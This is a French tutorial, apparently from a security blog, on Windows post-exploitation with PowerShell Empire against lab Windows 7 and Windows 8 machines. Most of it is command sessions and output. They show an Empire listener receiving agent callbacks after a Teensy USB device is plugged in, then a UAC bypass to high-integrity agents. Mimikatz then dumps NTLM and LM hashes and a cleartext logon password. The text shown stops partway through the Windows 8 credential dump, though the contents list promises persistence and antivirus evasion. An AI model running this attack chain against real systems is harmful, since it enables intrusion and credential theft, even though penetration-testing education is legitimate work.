Ce tutoriel est à la phase "Windows post exploitation" celle qui arrive après l'exploit, c'est à dire que pour y arriver il y a un peu de préparation à faire. Voir l'explication dans les phases Metasploit pour ceux qui n'ont pas la certification CEH
Ceci n'est qu'à titre informatif , ou bien academique. A ne pas reproduire dans votre société: en aucun cas l'auteur ne sera tenu responsable, d'une quelconque action .A ne pas utiliser en situation de productions ; entreprises , cadre pro sauf cas de missions de pentest white box, ou de force majeure ;)
vous avez le fameux mimikatz qui est français ;))
Du meterpreter déjà établie , j'entends par là "session" :petite touche finale :
les machines utilisées sont à titre purement éducatifs ; (il n'y a que des stagiaires !!! ;))vous remarquerez les services packs et les antivirus utilisés : et puis surtout :
EMPIRE <---
Table des matières
Créer et Excuter un Listener .............................................................................................................................................
Windows 7 SP1 FR x64 sans antivirus ...............................................................................................................................
Brancher le Teensy sur l’ordi cible 1 (Windows 7 SP1 FR x64 sans antivirus) ..............................................................
Elever les privilèges / Bypass UAC ................................................................................................................................
Révéler les mots de passe avec mimikatz .....................................................................................................................
Afficher les credentials ..................................................................................................................................................
Windows 8 FR x64 avec antivirus BitDefender Pro ...........................................................................................................
Brancher le Teensy sur l’ordi cible 2 (Windows 8 FR x64 avec antivirus BitDefender Pro) ..........................................
Elever les Privilèges / ByPass UAC.................................................................................................................................
Révéler les mots de passe avec Mimikatz ...................................................................................................................
Afficher les Credentials enregistrés ............................................................................................................................
Afficher les mots de passe enregistrés dans les navigateurs ..........................................................................................
Outils pour les comptes de messagerie et réseau ......................................................................................................
Rendre l’exploit permanent ............................................................................................................................................
Interagir avec Metasploit ................................................................................................................................................
Lancer une session Metasploit de type webdelivery ..................................................................................................
Dans Empire, lancer le module Invoke_Metasploitpayload .......................................................................................
Cas particulier de Windows 10 patché au 3/12/0000 et Windows Defender ................................................................
Mise en oeuvre de PowerMemory ..............................................................................................................................
Etablir la persistence avec WMI ......................................................................................................................................
Charger et Exécuter Mimikatz directement en mémoire ...............................................................................................
Lancer Empire
root@kali:~/Desktop/Empire# ./empire
====================================================================================
Empire: PowerShell post-exploitation agent | [Version]: 1.6.0
====================================================================================
[Web]: https://www.PowerShellEmpire.com/ | [Twitter]: @harmj0y, @sixdub, @enigma0x3
====================================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
180 modules currently loaded
0 listeners currently active
0 agents currently active
Créer et Excuter un Listener
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > set Host http://192.168.10.10:443
(Empire: listeners) > set Port 443
(Empire: listeners) > info
Listener Options:
Name Required Value Description
---- -------- ------- -----------
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True Maison-Interne Listener name.
DefaultLostLimit True 60 Number of missed checkins before exiting
StagingKey True eDZ/3zyc60Q-L2{=hC@^qVSG&9]}pE%: Staging key for initial agent negotiation.
Type True native Listener type (native, pivot, hop, foreign, meter).
RedirectTarget False Listener target to redirect to for pivot/hop.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
WorkingHours False Hours for the agent to operate (09:00-17:00).
Host True http://192.168.10.10:443 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
DefaultProfile True /admin/get.php,/news.asp,/login/ Default communication profile for the agent.
process.jsp|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Port True 443 Port for the listener.
(Empire: listeners) > set Name Maison-Interne
(Empire: listeners) > execute
[*] Listener 'Maison-Interne' successfully started.
(Empire: listeners) > list
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 Maison-Interne http://192.168.10.10:443 native 5/0.0
Windows 7 SP1 FR x64 sans antivirus
Brancher le Teensy sur l’ordi cible 1 (Windows 7 SP1 FR x64 sans antivirus)
(Empire: listeners) > [+] Initial agent EMTKR3BLFRX3VKUP from 192.168.10.15 now active
(Empire: listeners) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
EMTKR3BLFRX3VKUP 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 05:46:38
(Empire: agents) > rename EMTKR3BLFRX3VKUP W7Initial
(Empire: agents) > interact W7Initial
(Empire: W8Initial) > info
[*] Agent info:
ps_version 2
old_uris None
jitter 0.0
servers None
internal_ip 192.168.10.15
working_hours
session_key Bf,q{hHxR/_SC<sa>YL21I.QGv&!c0mj
children None
checkin_time 0000-11-26 05:46:27
hostname W7PRO-TARGET
delay 5
uris /admin/get.php,/news.asp,/login/process.jsp
username W7Pro-Target\stagiaire
kill_date
parent None
process_name powershell
listener http://192.168.10.10:443/
sessionID EMTKR3BLFRX3VKUP
process_id 772
os_details Microsoft Windows 7 Professionnel
lost_limit 60
ID 1
name W8Initial
external_ip 192.168.10.15
headers
user_agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time 0000-11-26 05:47:08
high_integrity 0
(Empire: W7TargetInitial) > whoami
(Empire: W7TargetInitial) >
W7Pro-Target\stagiaire
(Empire: W7TargetInitial) > shell whoami /all
(Empire: W7TargetInitial) >
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
====================== ==============================================
w7pro-target\stagiaire S-1-5-21-3636730399-3819297362-1632757559-1001
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
============================================== ================= ============================================== ====================================================
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activé par défaut, Groupe activé
W7Pro-Target\HomeUsers Alias S-1-5-21-3636730399-3819297362-1632757559-1000 Groupe obligatoire, Activé par défaut, Groupe activé
W7Pro-Target\Netmon Users Alias S-1-5-21-3636730399-3819297362-1632757559-1006 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Administrateurs Alias S-1-5-32-544 Groupe utilisé pour les refus uniquement
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\INTERACTIF Groupe bien connu S-1-5-4 Groupe obligatoire, Activé par défaut, Groupe activé
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Utilisateurs authentifiés Groupe bien connu S-1-5-11 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activé par défaut, Groupe activé
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activé par défaut, Groupe activé
Étiquette obligatoire\Niveau obligatoire moyen Nom S-1-16-8192 Groupe obligatoire, Activé par défaut, Groupe activé
Informations de privilèges----------------------
Nom de privilège Description État
============================= ============================================ =========
SeShutdownPrivilege Arrêter le système Désactivé
SeChangeNotifyPrivilege Contourner la vérification de parcours Activé
SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Désactivé
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Désactivé
SeTimeZonePrivilege Changer le fuseau horaire Désactivé
(Empire: W7TargetInitial) > getuid
(Empire: W7TargetInitial) >
W7Pro-Target\stagiaire
(Empire: W7TargetInitial) > ps
(Empire: W7TargetInitial) >
ProcessName PID Arch UserName MemUsage
----------- --- ---- -------- --------
Idle 0 x64 N/A 0,02 MB
System 4 x64 N/A 1,94 MB
smss 272 x64 AUTORITE NT\Système 0,23 MB
taskmgr 296 x64 W7Pro-Target\stagiaire 5,95 MB
csrss 356 x64 AUTORITE NT\Système 1,30 MB
svchost 404 x64 AUTORITE NT\SERVICE LOCAL 7,64 MB
wininit 408 x64 AUTORITE NT\Système 0,73 MB
csrss 420 x64 AUTORITE NT\Système 2,17 MB
winlogon 476 x64 AUTORITE NT\Système 0,92 MB
services 512 x64 AUTORITE NT\Système 3,89 MB
lsass 520 x64 AUTORITE NT\Système 5,91 MB
lsm 528 x64 AUTORITE NT\Système 1,51 MB
svchost 632 x64 AUTORITE NT\Système 3,62 MB
vmacthlp 692 x64 AUTORITE NT\Système 0,51 MB
svchost 724 x64 AUTORITE NT\SERVICE RÉSEAU 3,50 MB
powershell 748 x64 W7Pro-Target\stagiaire 54,68 MB
powershell 772 x64 W7Pro-Target\stagiaire 64,54 MB
svchost 776 x64 AUTORITE NT\SERVICE LOCAL 9,03 MB
svchost 916 x64 AUTORITE NT\Système 44,39 MB
svchost 940 x64 AUTORITE NT\Système 15,01 MB
msdtc 1052 x64 AUTORITE NT\SERVICE RÉSEAU 0,87 MB
svchost 1072 x64 AUTORITE NT\SERVICE RÉSEAU 7,65 MB
spoolsv 1172 x64 AUTORITE NT\Système 3,14 MB
svchost 1208 x64 AUTORITE NT\SERVICE LOCAL 7,15 MB
svchost 1316 x64 AUTORITE NT\SERVICE LOCAL 7,64 MB
vmtoolsd 1464 x64 AUTORITE NT\Système 5,15 MB
cmd 1500 x64 W7Pro-Target\stagiaire 1,19 MB
conhost 1592 x64 W7Pro-Target\stagiaire 2,31 MB
perfmon 1624 x64 W7Pro-Target\stagiaire 15,22 MB
TPAutoConnSvc 1656 x64 AUTORITE NT\Système 2,28 MB
svchost 1704 x64 AUTORITE NT\SERVICE LOCAL 0,65 MB
conhost 1952 x64 W7Pro-Target\stagiaire 4,50 MB
cmd 1968 x64 W7Pro-Target\stagiaire 2,41 MB
taskhost 2248 x64 W7Pro-Target\stagiaire 4,25 MB
dwm 2300 x64 W7Pro-Target\stagiaire 32,46 MB
explorer 2320 x64 W7Pro-Target\stagiaire 15,18 MB
vmtoolsd 2424 x64 W7Pro-Target\stagiaire 5,11 MB
TPAutoConnect 2492 x64 W7Pro-Target\stagiaire 12,11 MB
conhost 2504 x64 W7Pro-Target\stagiaire 0,54 MB
sppsvc 2576 x64 AUTORITE NT\SERVICE RÉSEAU 4,95 MB
svchost 2628 x64 AUTORITE NT\SERVICE LOCAL 7,04 MB
conhost 2636 x64 W7Pro-Target\stagiaire 4,96 MB
WmiPrvSE 2752 x64 AUTORITE NT\SERVICE RÉSEAU 6,44 MB
svchost 2860 x64 AUTORITE NT\Système 6,83 MB
SearchIndexer 2880 x64 AUTORITE NT\Système 6,19 MB
wmpnetwk 2968 x64 AUTORITE NT\SERVICE RÉSEAU 12,98 MB
(Empire: W7TargetInitial) >
(Empire: W7TargetIniti al) > ipconfig
(Empire: W7TargetInitial) >
Description : Connexion réseau Intel(R) PRO/1000 MT
MACAddress : 00:0C:29:66:F2:BB
DHCPEnabled : True
IPAddress : 192.168.10.15,fe80::ad4f:9b73:f76e:4d1d
IPSubnet : 255.255.255.0,64
DefaultIPGateway : 192.168.10.254
DNSServer : 8.8.8.8
DNSHostName : W7Pro-Target
DNSSuffix :
Elever les privilèges / Bypass UAC
(Empire: W7TargetInitial) > bypassuac Maison-Interne
[>] Module is not opsec safe, run? [y/N] y
(Empire: W7TargetInitial) >
Job started: Debug32_fne5l
[+] Initial agent UPTBGM4MRTXXELHL from 192.168.10.15 now active
(Empire: W7TargetInitial) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
W8Initial 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 05:50:40
UPTBGM4MRTXXELHL 192.168.10.15 W7PRO-TARGET *W7Pro-Target\stagiapowershell/748 5/0.0 0000-11-26 05:50:43
(Empire: agents) > rename UPTBGM4MRTXXELHL W7TargetElevated
(Empire: agents) > interact W7TargetElevated
(Empire: W7TargetElevated) > getuid
(Empire: W7TargetElevated) >
W7Pro-Target\stagiaire
(Empire: W7TargetElevated) > help
Agent Commands
==============
agents Jump to the Agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/0000).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).
(Empire: W7TargetElevated) > sysinfo
(Empire: W7TargetElevated) >
Listener: http://192.168.10.10:443
Internal IP: 192.168.10.15
Username: W7Pro-Target\stagiaire
Hostname: W7PRO-TARGET
OS: Microsoft Windows 7 Professionnel
High Integrity: 1
Process Name: powershell
Process ID: 748
PSVersion: 2
(Empire: W7TargetElevated) > shell whoami /all
(Empire: W7TargetElevated) >
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
====================== ==============================================
w7pro-target\stagiaire S-1-5-21-3636730399-3819297362-1632757559-1001
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
============================================== ================= ============================================== ============================================================================
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activé par défaut, Groupe activé
W7Pro-Target\HomeUsers Alias S-1-5-21-3636730399-3819297362-1632757559-1000 Groupe obligatoire, Activé par défaut, Groupe activé
W7Pro-Target\Netmon Users Alias S-1-5-21-3636730399-3819297362-1632757559-1006 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Administrateurs Alias S-1-5-32-544 Groupe obligatoire, Activé par défaut, Groupe activé, Propriétaire du groupe
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\INTERACTIF Groupe bien connu S-1-5-4 Groupe obligatoire, Activé par défaut, Groupe activé
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Utilisateurs authentifiés Groupe bien connu S-1-5-11 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activé par défaut, Groupe activé
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activé par défaut, Groupe activé
Étiquette obligatoire\Niveau obligatoire élevé Nom S-1-16-12288 Groupe obligatoire, Activé par défaut, Groupe activé
Informations de privilèges----------------------
Nom de privilège Description État
=============================== ========================================================= =========
SeIncreaseQuotaPrivilege Ajuster les quotas de mémoire pour un processus Désactivé
SeSecurityPrivilege Gérer le journal d'audit et de sécurité Désactivé
SeTakeOwnershipPrivilege Prendre possession de fichiers ou d'autres objets Désactivé
SeLoadDriverPrivilege Charger et décharger les pilotes de périphériques Désactivé
SeSystemProfilePrivilege Performance système du profil Désactivé
SeSystemtimePrivilege Modifier l'heure système Désactivé
SeProfileSingleProcessPrivilege Processus unique du profil Désactivé
SeIncreaseBasePriorityPrivilege Augmenter la priorité de planification Désactivé
SeCreatePagefilePrivilege Créer un fichier d'échange Désactivé
SeBackupPrivilege Sauvegarder les fichiers et les répertoires Désactivé
SeRestorePrivilege Restaurer les fichiers et les répertoires Désactivé
SeShutdownPrivilege Arrêter le système Désactivé
SeDebugPrivilege Déboguer les programmes Activé
SeSystemEnvironmentPrivilege Modifier les valeurs de l'environnement du microprogramme Désactivé
SeChangeNotifyPrivilege Contourner la vérification de parcours Activé
SeRemoteShutdownPrivilege Forcer l'arrêt à partir d'un système distant Désactivé
SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Désactivé
SeManageVolumePrivilege Effectuer les tâches de maintenance de volume Désactivé
SeImpersonatePrivilege Emprunter l'identité d'un client après l'authentification Activé
SeCreateGlobalPrivilege Créer des objets globaux Activé
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Désactivé
SeTimeZonePrivilege Changer le fuseau horaire Désactivé
SeCreateSymbolicLinkPrivilege Créer des liens symboliques Désactivé
Révéler les mots de passe avec mimikatz
(Empire: W7TargetElevated) > mimikatz
(Empire: W7TargetElevated) >
Job started: Debug32_w78lt
Hostname: W7Pro-Target / S-1-5-21-3636730399-3819297362-1632757559
.#####. mimikatz 2.1 (x64) built on Mar 31 0000 16:45:32
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 18 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 333274 (00000000:000515da)
Session : Interactive from 1
User Name : stagiaire
Domain : W7Pro-Target
Logon Server : W7PRO-TARGET
Logon Time : 25/11/0000 22:22:47
SID : S-1-5-21-3636730399-3819297362-1632757559-1001
msv :
[00000003] Primary
* Username : stagiaire
* Domain : W7Pro-Target
* LM : 727e3576618fa1754a3b108f3fa6cb6d
* NTLM : 92937945b518814341de3f726500d4ff
* SHA1 : e99089abfd8d6af75c2c45dc4321ac7f28f7ed9d
tspkg :
* Username : stagiaire
* Domain : W7Pro-Target
* Password : Pa$$w0rd
wdigest :
* Username : stagiaire
* Domain : W7Pro-Target
* Password : Pa$$w0rd
kerberos :
* Username : stagiaire
* Domain : W7Pro-Target
* Password : Pa$$w0rd
ssp :
credman :
……………
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz(powershell) # exit
Bye!
Afficher les credentials
(Empire: W7TargetElevated) > creds
Credentials:
CredID CredType Domain UserName Host Password
------ -------- ------ -------- ---- --------
1 hash W7Pro-Target stagiaire W7Pro-Target 92937945b518814341de3f726500d4ff
2 plaintext W7Pro-Target stagiaire W7Pro-Target Pa$$w0rd
Windows 8 FR x64 avec antivirus BitDefender Pro
Brancher le Teensy sur l’ordi cible 2 (Windows 8 FR x64 avec antivirus BitDefender Pro)
(Empire: agents) > list
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
W7TargetInitial 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 05:56:39
W7TargetElevated 192.168.10.15 W7PRO-TARGET *W7Pro-Target\stagiapowershell/748 5/0.0 0000-11-26 05:56:39
W8Initial 192.168.10.7 PC-seb-W8 PC-seb-W8\seb powershell/1960 5/0.0 0000-11-26 05:56:39
(Empire: agents) > interact W8Initial
(Empire: W8Initial) > getuid
(Empire: W8Initial) >
PC-seb-W8\seb
(Empire: W8Initial) > shell whoami /all
(Empire: W8Initial) >
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
================= =============================================
pc-seb-w8\hacker01 S-1-5-21-566588737-1584445077-3077383569-1001
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
============================================================ ================= ============================================= ====================================================
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Compte local et membre du groupe Administrateurs Groupe bien connu S-1-5-114 Groupe utilisé pour les refus uniquement
PC-seb-W8\Message Capture Users Alias S-1-5-21-566588737-1584445077-3077383569-1007 Groupe obligatoire, Activé par défaut, Groupe activé
PC-seb-W8\Netmon Users Alias S-1-5-21-566588737-1584445077-3077383569-1006 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Administrateurs Alias S-1-5-32-544 Groupe utilisé pour les refus uniquement
BUILTIN\Utilisateurs du journal de performances Alias S-1-5-32-559 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\INTERACTIF Groupe bien connu S-1-5-4 Groupe obligatoire, Activé par défaut, Groupe activé
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Utilisateurs authentifiés Groupe bien connu S-1-5-11 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Compte local Groupe bien connu S-1-5-113 Groupe obligatoire, Activé par défaut, Groupe activé
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activé par défaut, Groupe activé
Étiquette obligatoire\Niveau obligatoire moyen Nom S-1-16-8192
Informations de privilèges----------------------
Nom de privilège Description État
============================= ============================================ =========
SeShutdownPrivilege Arrêter le système Désactivé
SeChangeNotifyPrivilege Contourner la vérification de parcours Activé
SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Désactivé
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Désactivé
SeTimeZonePrivilege Changer le fuseau horaire Désactivé
Elever les Privilèges / ByPass UAC
(Empire: W8Initial) > bypassuac Maison-Interne
[>] Module is not opsec safe, run? [y/N] y
(Empire: W8Initial) >
Job started: Debug32_t17rx
[+] Initial agent LMD1T43DPSBLK2ME from 192.168.10.7 now active
(Empire: W8Initial) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen
--------- ----------- ------------ --------- ------- ----- --------------------
W7TargetInitial 192.168.10.15 W7PRO-TARGET W7Pro-Target\stagiaipowershell/772 5/0.0 0000-11-26 05:57:50
W7TargetElevated 192.168.10.15 W7PRO-TARGET *W7Pro-Target\stagiapowershell/748 5/0.0 0000-11-26 05:57:50
W8Initial 192.168.10.7 PC-seb-W8 PC-seb-W8\seb powershell/1960 5/0.0 0000-11-26 05:57:49
LMD1T43DPSBLK2ME 192.168.10.7 PC-seb-W8 *PC-seb-W8\seb powershell/11748 5/0.0 0000-11-26 05:57:49
(Empire: agents) > rename LMD1T43DPSBLK2ME W8Elevated
(Empire: agents) > interact W8Elevated
(Empire: W8Elevated) > getuid
(Empire: W8Elevated) >
PC-seb-W8\seb
(Empire: W8Elevated) > shell whoami /all
(Empire: W8Elevated) >
Informations sur l'utilisateur
------------------------
Nom d'utilisateur SID
================= =============================================
pc-seb-w8\hacker01 S-1-5-21-566588737-1584445077-3077383569-1001
Informations de groupe
----------------------
Nom du groupe Type SID Attributs
============================================================ ================= ============================================= ============================================================================
Tout le monde Groupe bien connu S-1-1-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Compte local et membre du groupe Administrateurs Groupe bien connu S-1-5-114 Groupe obligatoire, Activé par défaut, Groupe activé
PC-seb-W8\Message Capture Users Alias S-1-5-21-566588737-1584445077-3077383569-1007 Groupe obligatoire, Activé par défaut, Groupe activé
PC-seb-W8\Netmon Users Alias S-1-5-21-566588737-1584445077-3077383569-1006 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Administrateurs Alias S-1-5-32-544 Groupe obligatoire, Activé par défaut, Groupe activé, Propriétaire du groupe
BUILTIN\Utilisateurs du journal de performances Alias S-1-5-32-559 Groupe obligatoire, Activé par défaut, Groupe activé
BUILTIN\Utilisateurs Alias S-1-5-32-545 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\INTERACTIF Groupe bien connu S-1-5-4 Groupe obligatoire, Activé par défaut, Groupe activé
OUVERTURE DE SESSION DE CONSOLE Groupe bien connu S-1-2-1 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Utilisateurs authentifiés Groupe bien connu S-1-5-11 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Cette organisation Groupe bien connu S-1-5-15 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Compte local Groupe bien connu S-1-5-113 Groupe obligatoire, Activé par défaut, Groupe activé
LOCAL Groupe bien connu S-1-2-0 Groupe obligatoire, Activé par défaut, Groupe activé
AUTORITE NT\Authentifications NTLM Groupe bien connu S-1-5-64-10 Groupe obligatoire, Activé par défaut, Groupe activé
Étiquette obligatoire\Niveau obligatoire élevé Nom S-1-16-12288
Informations de privilèges----------------------
Nom de privilège Description État
=============================== ========================================================= =========
SeIncreaseQuotaPrivilege Ajuster les quotas de mémoire pour un processus Désactivé
SeSecurityPrivilege Gérer le journal d'audit et de sécurité Désactivé
SeTakeOwnershipPrivilege Prendre possession de fichiers ou d'autres objets Désactivé
SeLoadDriverPrivilege Charger et décharger les pilotes de périphériques Désactivé
SeSystemProfilePrivilege Performance système du profil Désactivé
SeSystemtimePrivilege Modifier l'heure système Désactivé
SeProfileSingleProcessPrivilege Processus unique du profil Désactivé
SeIncreaseBasePriorityPrivilege Augmenter la priorité de planification Désactivé
SeCreatePagefilePrivilege Créer un fichier d'échange Désactivé
SeBackupPrivilege Sauvegarder les fichiers et les répertoires Désactivé
SeRestorePrivilege Restaurer les fichiers et les répertoires Désactivé
SeShutdownPrivilege Arrêter le système Désactivé
SeDebugPrivilege Déboguer les programmes Activé
SeSystemEnvironmentPrivilege Modifier les valeurs de l'environnement du microprogramme Désactivé
SeChangeNotifyPrivilege Contourner la vérification de parcours Activé
SeRemoteShutdownPrivilege Forcer l'arrêt à partir d'un système distant Désactivé
SeUndockPrivilege Retirer l'ordinateur de la station d'accueil Désactivé
SeManageVolumePrivilege Effectuer les tâches de maintenance de volume Désactivé
SeImpersonatePrivilege Emprunter l'identité d'un client après l'authentification Activé
SeCreateGlobalPrivilege Créer des objets globaux Activé
SeIncreaseWorkingSetPrivilege Augmenter une plage de travail de processus Désactivé
SeTimeZonePrivilege Changer le fuseau horaire Désactivé
SeCreateSymbolicLinkPrivilege Créer des liens symboliques Désactivé
(Empire: W8Elevated) > help
Agent Commands
==============
agents Jump to the Agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/0000).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).
Révéler les mots de passe avec Mimikatz
(Empire: W8Elevated) > mimikatz
(Empire: W8Elevated) >
Job started: Debug32_x2qk9
Hostname: PC-seb-W8 / -
.#####. mimikatz 2.1 (x64) built on Mar 31 0000 16:45:32
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 18 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : AUTORITE NT
Logon Server : (null)
Logon Time : 25/11/0000 21:30:32
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
livessp :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 230327 (00000000:000383b7)
Session : Interactive from 1
User Name : hacker01
Domain : PC-seb-W8
Logon Server : PC-seb-W8
Logon Time : 25/11/0000 21:30:05
SID : S-1-5-21-566588737-1584445077-3077383569-1001
msv :
[00000003] Primary
* Username : hacker01
* Domain : PC-seb-W8
* NTLM : e438dcaf8595c62f710844571d880da1
* SHA1 : 81ac80a674d4c5f1f7f03b8f3dfe88cc0fb6b258
[00010000] CredentialKeys
* NTLM : e438dcaf8595c62f710844571d880da1
* SHA1 : 81ac80a674d4c5f1f7f03b8f3dfe88cc0fb6b258
